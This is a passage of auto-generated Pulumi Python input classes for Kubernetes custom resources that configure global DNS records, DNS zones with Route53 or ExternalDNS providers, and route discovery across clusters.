def http_headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetHttpHeadersArgs']]]]:
"""
Custom headers to set in the request. HTTP allows repeated headers.
"""
return pulumi.get(self, "http_headers")
@http_headers.setter
def http_headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetHttpHeadersArgs']]]]):
pulumi.set(self, "http_headers", value)
@property
@pulumi.getter
def path(self) -> Optional[pulumi.Input[str]]:
"""
Path to access on the HTTP server.
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def scheme(self) -> Optional[pulumi.Input[str]]:
"""
Scheme to use for connecting to the host. Defaults to HTTP.
"""
return pulumi.get(self, "scheme")
@scheme.setter
def scheme(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scheme", value)
@pulumi.input_type
class GlobalDNSRecordSpecHealthCheckHttpGetHttpHeadersArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
value: pulumi.Input[str]):
"""
HTTPHeader describes a custom header to be used in HTTP probes
:param pulumi.Input[str] name: The header field name
:param pulumi.Input[str] value: The header field value
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The header field name
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
The header field value
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class GlobalDNSRecordSpecHealthCheckHttpGetPortArgs:
def __init__(__self__):
pass
@pulumi.input_type
class GlobalDNSRecordSpecHealthCheckTcpSocketArgs:
def __init__(__self__, *,
port: pulumi.Input['GlobalDNSRecordSpecHealthCheckTcpSocketPortArgs'],
host: Optional[pulumi.Input[str]] = None):
"""
TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook
:param pulumi.Input['GlobalDNSRecordSpecHealthCheckTcpSocketPortArgs'] port: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME.
:param pulumi.Input[str] host: Optional: Host name to connect to, defaults to the pod IP.
"""
pulumi.set(__self__, "port", port)
if host is not None:
pulumi.set(__self__, "host", host)
@property
@pulumi.getter
def port(self) -> pulumi.Input['GlobalDNSRecordSpecHealthCheckTcpSocketPortArgs']:
"""
Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input['GlobalDNSRecordSpecHealthCheckTcpSocketPortArgs']):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
Optional: Host name to connect to, defaults to the pod IP.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@pulumi.input_type
class GlobalDNSRecordSpecHealthCheckTcpSocketPortArgs:
def __init__(__self__):
pass
@pulumi.input_type
class GlobalDNSRecordStatusArgs:
def __init__(__self__, *,
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusConditionsArgs']]]] = None,
endpoint_statuses: Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusEndpointStatusesArgs']]]]]] = None,
monitored_service_statuses: Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusMonitoredServiceStatusesArgs']]]]]] = None,
provider_status: Optional[pulumi.Input['GlobalDNSRecordStatusProviderStatusArgs']] = None):
"""
GlobalDNSRecordStatus defines the observed state of GlobalDNSRecord
:param pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusConditionsArgs']]] conditions: ReconcileStatus this is the general status of the main reconciler
        :param pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusEndpointStatusesArgs']]]]] endpoint_statuses: EndpointStatuses contains the status of the endpoints as they were looked up during the latest reconcile. We don't fail when an endpoint lookup fails, but we need to track its status.
:param pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusMonitoredServiceStatusesArgs']]]]] monitored_service_statuses: MonitoredServiceStatuses contains the reconcile status of each of the monitored services in the remote clusters
:param pulumi.Input['GlobalDNSRecordStatusProviderStatusArgs'] provider_status: ProviderStatus contains provider specific status information
"""
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
if endpoint_statuses is not None:
pulumi.set(__self__, "endpoint_statuses", endpoint_statuses)
if monitored_service_statuses is not None:
pulumi.set(__self__, "monitored_service_statuses", monitored_service_statuses)
if provider_status is not None:
pulumi.set(__self__, "provider_status", provider_status)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusConditionsArgs']]]]:
"""
ReconcileStatus this is the general status of the main reconciler
"""
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusConditionsArgs']]]]):
pulumi.set(self, "conditions", value)
@property
@pulumi.getter(name="endpointStatuses")
def endpoint_statuses(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusEndpointStatusesArgs']]]]]]:
"""
        EndpointStatuses contains the status of the endpoints as they were looked up during the latest reconcile. We don't fail when an endpoint lookup fails, but we need to track its status.
"""
return pulumi.get(self, "endpoint_statuses")
@endpoint_statuses.setter
def endpoint_statuses(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusEndpointStatusesArgs']]]]]]):
pulumi.set(self, "endpoint_statuses", value)
@property
@pulumi.getter(name="monitoredServiceStatuses")
def monitored_service_statuses(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusMonitoredServiceStatusesArgs']]]]]]:
"""
MonitoredServiceStatuses contains the reconcile status of each of the monitored services in the remote clusters
"""
return pulumi.get(self, "monitored_service_statuses")
@monitored_service_statuses.setter
def monitored_service_statuses(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusMonitoredServiceStatusesArgs']]]]]]):
pulumi.set(self, "monitored_service_statuses", value)
@property
@pulumi.getter(name="providerStatus")
def provider_status(self) -> Optional[pulumi.Input['GlobalDNSRecordStatusProviderStatusArgs']]:
"""
ProviderStatus contains provider specific status information
"""
return pulumi.get(self, "provider_status")
@provider_status.setter
def provider_status(self, value: Optional[pulumi.Input['GlobalDNSRecordStatusProviderStatusArgs']]):
pulumi.set(self, "provider_status", value)
@pulumi.input_type
class GlobalDNSRecordStatusConditionsArgs:
def __init__(__self__, *,
status: pulumi.Input[str],
type: pulumi.Input[str],
last_transition_time: Optional[pulumi.Input[str]] = None,
message: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
:param pulumi.Input[str] type: ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
:param pulumi.Input[str] reason: ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> pulumi.Input[str]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: pulumi.Input[str]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "last_transition_time")
@last_transition_time.setter
def last_transition_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_transition_time", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
"""
ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@pulumi.input_type
class GlobalDNSRecordStatusEndpointStatusesArgs:
def __init__(__self__, *,
status: pulumi.Input[str],
type: pulumi.Input[str],
last_transition_time: Optional[pulumi.Input[str]] = None,
message: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
:param pulumi.Input[str] type: ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
:param pulumi.Input[str] reason: ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> pulumi.Input[str]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: pulumi.Input[str]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "last_transition_time")
@last_transition_time.setter
def last_transition_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_transition_time", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
"""
ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@pulumi.input_type
class GlobalDNSRecordStatusMonitoredServiceStatusesArgs:
def __init__(__self__, *,
status: pulumi.Input[str],
type: pulumi.Input[str],
last_transition_time: Optional[pulumi.Input[str]] = None,
message: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
:param pulumi.Input[str] type: ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
:param pulumi.Input[str] reason: ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> pulumi.Input[str]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: pulumi.Input[str]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "last_transition_time")
@last_transition_time.setter
def last_transition_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_transition_time", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
"""
ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@pulumi.input_type
class GlobalDNSRecordStatusProviderStatusArgs:
def __init__(__self__, *,
route53: Optional[pulumi.Input['GlobalDNSRecordStatusProviderStatusRoute53Args']] = None):
"""
ProviderStatus contains provider specific status information
"""
if route53 is not None:
pulumi.set(__self__, "route53", route53)
@property
@pulumi.getter
def route53(self) -> Optional[pulumi.Input['GlobalDNSRecordStatusProviderStatusRoute53Args']]:
return pulumi.get(self, "route53")
@route53.setter
def route53(self, value: Optional[pulumi.Input['GlobalDNSRecordStatusProviderStatusRoute53Args']]):
pulumi.set(self, "route53", value)
@pulumi.input_type
class GlobalDNSRecordStatusProviderStatusRoute53Args:
def __init__(__self__, *,
health_check_id: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
policy_id: Optional[pulumi.Input[str]] = None,
policy_instance_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] health_check_id: HealthCheckID represents the route53 healthcheck created for this record
:param pulumi.Input[str] policy_id: PolicyID represents the route53 routing policy created for this record
:param pulumi.Input[str] policy_instance_id: PolicyInstanceID represents the ID of the DNSRecord
"""
if health_check_id is not None:
pulumi.set(__self__, "health_check_id", health_check_id)
if policy_id is not None:
pulumi.set(__self__, "policy_id", policy_id)
if policy_instance_id is not None:
pulumi.set(__self__, "policy_instance_id", policy_instance_id)
@property
@pulumi.getter(name="healthCheckID")
def health_check_id(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
HealthCheckID represents the route53 healthcheck created for this record
"""
return pulumi.get(self, "health_check_id")
@health_check_id.setter
def health_check_id(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "health_check_id", value)
@property
@pulumi.getter(name="policyID")
def policy_id(self) -> Optional[pulumi.Input[str]]:
"""
PolicyID represents the route53 routing policy created for this record
"""
return pulumi.get(self, "policy_id")
@policy_id.setter
def policy_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "policy_id", value)
@property
@pulumi.getter(name="policyInstanceID")
def policy_instance_id(self) -> Optional[pulumi.Input[str]]:
"""
PolicyInstanceID represents the ID of the DNSRecord
"""
return pulumi.get(self, "policy_instance_id")
@policy_instance_id.setter
def policy_instance_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "policy_instance_id", value)
@pulumi.input_type
class GlobalDNSZoneSpecArgs:
def __init__(__self__, *,
domain: pulumi.Input[str],
provider: pulumi.Input['GlobalDNSZoneSpecProviderArgs']):
"""
GlobalDNSZoneSpec defines the desired state of GlobalDNSZone
:param pulumi.Input['GlobalDNSZoneSpecProviderArgs'] provider: ProviderConfig configures kind and access to the DNS Zone. Exactly one of its members must be set.
"""
pulumi.set(__self__, "domain", domain)
pulumi.set(__self__, "provider", provider)
@property
@pulumi.getter
def domain(self) -> pulumi.Input[str]:
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: pulumi.Input[str]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter
def provider(self) -> pulumi.Input['GlobalDNSZoneSpecProviderArgs']:
"""
ProviderConfig configures kind and access to the DNS Zone. Exactly one of its members must be set.
"""
return pulumi.get(self, "provider")
@provider.setter
def provider(self, value: pulumi.Input['GlobalDNSZoneSpecProviderArgs']):
pulumi.set(self, "provider", value)
@pulumi.input_type
class GlobalDNSZoneSpecProviderArgs:
def __init__(__self__, *,
external_dns: Optional[pulumi.Input['GlobalDNSZoneSpecProviderExternalDNSArgs']] = None,
route53: Optional[pulumi.Input['GlobalDNSZoneSpecProviderRoute53Args']] = None):
"""
ProviderConfig configures kind and access to the DNS Zone. Exactly one of its members must be set.
        :param pulumi.Input['GlobalDNSZoneSpecProviderExternalDNSArgs'] external_dns: ExternalDNSProviderConfig contains configuration on how to configure the external DNS provider
:param pulumi.Input['GlobalDNSZoneSpecProviderRoute53Args'] route53: Route53ProviderConfig contains configuration on how to access the route53 API
"""
if external_dns is not None:
pulumi.set(__self__, "external_dns", external_dns)
if route53 is not None:
pulumi.set(__self__, "route53", route53)
@property
@pulumi.getter(name="externalDNS")
def external_dns(self) -> Optional[pulumi.Input['GlobalDNSZoneSpecProviderExternalDNSArgs']]:
"""
        ExternalDNSProviderConfig contains configuration on how to configure the external DNS provider
"""
return pulumi.get(self, "external_dns")
@external_dns.setter
def external_dns(self, value: Optional[pulumi.Input['GlobalDNSZoneSpecProviderExternalDNSArgs']]):
pulumi.set(self, "external_dns", value)
@property
@pulumi.getter
def route53(self) -> Optional[pulumi.Input['GlobalDNSZoneSpecProviderRoute53Args']]:
"""
Route53ProviderConfig contains configuration on how to access the route53 API
"""
return pulumi.get(self, "route53")
@route53.setter
def route53(self, value: Optional[pulumi.Input['GlobalDNSZoneSpecProviderRoute53Args']]):
pulumi.set(self, "route53", value)
@pulumi.input_type
class GlobalDNSZoneSpecProviderExternalDNSArgs:
def __init__(__self__, *,
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
        ExternalDNSProviderConfig contains configuration on how to configure the external DNS provider
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] annotations: Annotations is a map of annotations to be added to the created DNSEndpoint records.
"""
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Annotations is a map of annotations to be added to the created DNSEndpoint records.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@pulumi.input_type
class GlobalDNSZoneSpecProviderRoute53Args:
def __init__(__self__, *,
credentials_secret_ref: pulumi.Input['GlobalDNSZoneSpecProviderRoute53CredentialsSecretRefArgs'],
zone_id: pulumi.Input[str]):
"""
Route53ProviderConfig contains configuration on how to access the route53 API
:param pulumi.Input['GlobalDNSZoneSpecProviderRoute53CredentialsSecretRefArgs'] credentials_secret_ref: CredentialsSecretRef is a reference to a secret containing the credentials to access the AWS API //TODO (content and needed permissions) expected secret keys are "aws_access_key_id" and "aws_secret_access_key"
:param pulumi.Input[str] zone_id: ZoneID is the AWS route53 zone ID.
"""
pulumi.set(__self__, "credentials_secret_ref", credentials_secret_ref)
pulumi.set(__self__, "zone_id", zone_id)
@property
@pulumi.getter(name="credentialsSecretRef")
def credentials_secret_ref(self) -> pulumi.Input['GlobalDNSZoneSpecProviderRoute53CredentialsSecretRefArgs']:
"""
CredentialsSecretRef is a reference to a secret containing the credentials to access the AWS API //TODO (content and needed permissions) expected secret keys are "aws_access_key_id" and "aws_secret_access_key"
"""
return pulumi.get(self, "credentials_secret_ref")
@credentials_secret_ref.setter
def credentials_secret_ref(self, value: pulumi.Input['GlobalDNSZoneSpecProviderRoute53CredentialsSecretRefArgs']):
pulumi.set(self, "credentials_secret_ref", value)
@property
@pulumi.getter(name="zoneID")
def zone_id(self) -> pulumi.Input[str]:
"""
ZoneID is the AWS route53 zone ID.
"""
return pulumi.get(self, "zone_id")
@zone_id.setter
def zone_id(self, value: pulumi.Input[str]):
pulumi.set(self, "zone_id", value)
@pulumi.input_type
class GlobalDNSZoneSpecProviderRoute53CredentialsSecretRefArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
namespace: pulumi.Input[str]):
"""
CredentialsSecretRef is a reference to a secret containing the credentials to access the AWS API //TODO (content and needed permissions) expected secret keys are "aws_access_key_id" and "aws_secret_access_key"
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "namespace", namespace)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@pulumi.input_type
class GlobalDNSZoneStatusArgs:
def __init__(__self__, *,
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSZoneStatusConditionsArgs']]]] = None):
"""
GlobalDNSZoneStatus defines the observed state of GlobalDNSZone
:param pulumi.Input[Sequence[pulumi.Input['GlobalDNSZoneStatusConditionsArgs']]] conditions: INSERT ADDITIONAL STATUS FIELD - define observed state of cluster Important: Run "operator-sdk generate k8s" to regenerate code after modifying this file Add custom validation using kubebuilder tags: https://book-v1.book.kubebuilder.io/beyond_basics/generating_crd.html
"""
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSZoneStatusConditionsArgs']]]]:
"""
INSERT ADDITIONAL STATUS FIELD - define observed state of cluster Important: Run "operator-sdk generate k8s" to regenerate code after modifying this file Add custom validation using kubebuilder tags: https://book-v1.book.kubebuilder.io/beyond_basics/generating_crd.html
"""
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSZoneStatusConditionsArgs']]]]):
pulumi.set(self, "conditions", value)
@pulumi.input_type
class GlobalDNSZoneStatusConditionsArgs:
def __init__(__self__, *,
status: pulumi.Input[str],
type: pulumi.Input[str],
last_transition_time: Optional[pulumi.Input[str]] = None,
message: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
:param pulumi.Input[str] type: ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
:param pulumi.Input[str] reason: ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> pulumi.Input[str]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: pulumi.Input[str]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "last_transition_time")
@last_transition_time.setter
def last_transition_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_transition_time", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
"""
ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@pulumi.input_type
class GlobalRouteDiscoverySpecArgs:
def __init__(__self__, *,
global_zone_ref: pulumi.Input['GlobalRouteDiscoverySpecGlobalZoneRefArgs'],
clusters: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoverySpecClustersArgs']]]] = None,
default_load_balancing_policy: Optional[pulumi.Input[str]] = None,
default_ttl: Optional[pulumi.Input[int]] = None,
route_selector: Optional[pulumi.Input['GlobalRouteDiscoverySpecRouteSelectorArgs']] = None):
"""
GlobalRouteDiscoverySpec defines the desired state of GlobalRouteDiscovery
:param pulumi.Input['GlobalRouteDiscoverySpecGlobalZoneRefArgs'] global_zone_ref: GlobalZoneRef represents the global zone that will be used to host this record
        :param pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoverySpecClustersArgs']]] clusters: Clusters is an array with the list of clusters in which global routes will be discovered
        :param pulumi.Input[str] default_load_balancing_policy: DefaultLoadBalancingPolicy defines the load balancing policy to be used by default. This can be overridden with a route annotation TODO which? -kubebuilder:default:="Multivalue"
        :param pulumi.Input[int] default_ttl: Default TTL is the TTL for this DNS record -kubebuilder:default:60
        :param pulumi.Input['GlobalRouteDiscoverySpecRouteSelectorArgs'] route_selector: RouteSelector is the selector that selects the global routes; this also allows you to define local routes.
"""
pulumi.set(__self__, "global_zone_ref", global_zone_ref)
if clusters is not None:
pulumi.set(__self__, "clusters", clusters)
if default_load_balancing_policy is not None:
pulumi.set(__self__, "default_load_balancing_policy", default_load_balancing_policy)
if default_ttl is not None:
pulumi.set(__self__, "default_ttl", default_ttl)
if route_selector is not None:
pulumi.set(__self__, "route_selector", route_selector)
@property
@pulumi.getter(name="globalZoneRef")
def global_zone_ref(self) -> pulumi.Input['GlobalRouteDiscoverySpecGlobalZoneRefArgs']:
"""
GlobalZoneRef represents the global zone that will be used to host this record
"""
return pulumi.get(self, "global_zone_ref")
@global_zone_ref.setter
def global_zone_ref(self, value: pulumi.Input['GlobalRouteDiscoverySpecGlobalZoneRefArgs']):
pulumi.set(self, "global_zone_ref", value)
@property
@pulumi.getter
def clusters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoverySpecClustersArgs']]]]:
"""
        Clusters is an array with the list of clusters in which global routes will be discovered
"""
return pulumi.get(self, "clusters")
@clusters.setter
def clusters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoverySpecClustersArgs']]]]):
pulumi.set(self, "clusters", value)
@property
@pulumi.getter(name="defaultLoadBalancingPolicy")
def default_load_balancing_policy(self) -> Optional[pulumi.Input[str]]:
"""
DefaultLoadBalancingPolicy defines the load balancing policy to be used by default. This can be overridden with a route annotation TODO which? -kubebuilder:default:="Multivalue"
"""
return pulumi.get(self, "default_load_balancing_policy")
@default_load_balancing_policy.setter
def default_load_balancing_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_load_balancing_policy", value)
@property
@pulumi.getter(name="defaultTTL")
def default_ttl(self) -> Optional[pulumi.Input[int]]:
"""
        Default TTL is the TTL for this DNS record -kubebuilder:default:60
"""
return pulumi.get(self, "default_ttl")
@default_ttl.setter
